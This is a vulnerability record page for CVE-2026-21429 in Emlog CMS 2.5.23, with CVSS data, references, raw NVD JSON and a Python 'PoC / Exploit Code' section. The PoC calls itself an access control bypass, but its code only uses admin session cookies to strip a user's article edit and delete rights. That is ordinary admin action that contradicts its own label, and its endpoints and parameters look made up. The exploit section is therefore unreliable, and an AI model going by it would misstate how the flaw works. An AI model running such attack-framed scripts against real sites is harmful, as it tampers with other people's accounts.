CVE-2026-21429

Description

Emlog is an open source website building system. In version 2.5.23, the admin can set controls which makes users unable to edit or delete their articles after publishing them. As of time of publication, no known patched versions are available.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:2.5.23:*:*:*:pro:*:*:* - VULNERABLE

emlog 2.5.23

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2026-21429 PoC - Emlog CMS Access Control Bypass
# Target: Emlog CMS 2.5.23
# Vulnerability: Admin can restrict users from editing/deleting their articles

TARGET_URL = "http://target-site.com/emlog"
ADMIN_COOKIES = {"EMLOG_ADMIN": "admin_session_cookie"}
TARGET_USER_ID = 2

def exploit_restrict_user_permissions():
    """
    Exploit: Admin restricts user from editing/deleting articles
    Steps:
    1. Authenticate as admin
    2. Access user permission settings
    3. Modify target user's permissions
    4. Verify restriction applied
    """
    session = requests.Session()
    session.cookies.update(ADMIN_COOKIES)
    
    # Step 1: Access admin user management panel
    admin_users_url = f"{TARGET_URL}/admin/user.php?action=edit&uid={TARGET_USER_ID}"
    response = session.get(admin_users_url)
    
    if response.status_code != 200:
        print("[-] Failed to access admin panel")
        return False
    
    # Step 2: Modify user permissions to restrict article editing
    restricted_permissions = {
        "uid": TARGET_USER_ID,
        "article_edit": 0,      # Disable edit
        "article_delete": 0,    # Disable delete
        "role": "subscriber"    # Lower privilege level
    }
    
    update_url = f"{TARGET_URL}/admin/user.php?action=update"
    response = session.post(update_url, data=restricted_permissions)
    
    if response.status_code == 200:
        print("[+] Successfully restricted user permissions")
        print(f"[+] User {TARGET_USER_ID} can no longer edit/delete articles")
        return True
    else:
        print("[-] Permission modification failed")
        return False

def verify_restriction():
    """
    Verify the restriction was applied
    """
    session = requests.Session()
    
    # Victim user attempts to edit their own article
    victim_cookies = {"EMLOG_USER": "victim_session_cookie"}
    session.cookies.update(victim_cookies)
    
    article_id = 123
    edit_url = f"{TARGET_URL}/admin/article.php?action=edit&id={article_id}"
    response = session.get(edit_url)
    
    if "permission denied" in response.text.lower() or response.status_code == 403:
        print("[+] Verification: User is restricted from editing articles")
        return True
    else:
        print("[-] Restriction may not have been applied")
        return False

if __name__ == "__main__":
    print("=" * 50)
    print("CVE-2026-21429 PoC - Emlog Access Control Bypass")
    print("=" * 50)
    exploit_restrict_user_permissions()
    verify_restriction()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21429
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21429
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21429/
[4] VulDB https://vuldb.com/cve/CVE-2026-21429
[5] https://github.com/emlog/emlog/security/advisories/GHSA-jw5v-2g53-rx8w

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21429", "sourceIdentifier": "[email protected]", "published": "2026-01-02T18:15:55.110", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emlog is an open source website building system. In version 2.5.23, the admin can set controls which makes users unable to edit or delete their articles after publishing them. As of time of publication, no known patched versions are available."}, {"lang": "es", "value": "Emlog es un sistema de creación de sitios web de código abierto. En la versión 2.5.23, el administrador puede establecer controles que impiden a los usuarios editar o eliminar sus artículos después de publicarlos. En el momento de la publicación, no se conocen versiones parcheadas disponibles."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emlog:emlog:2.5.23:*:*:*:pro:*:*:*", "matchCriteriaId": "CBBD3D75-C2B3-4727-9B9E-6408956E4ADB"}]}]}], "references": [{"url": "https://github.com/emlog/emlog/security/advisories/GHSA-jw5v-2g53-rx8w", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}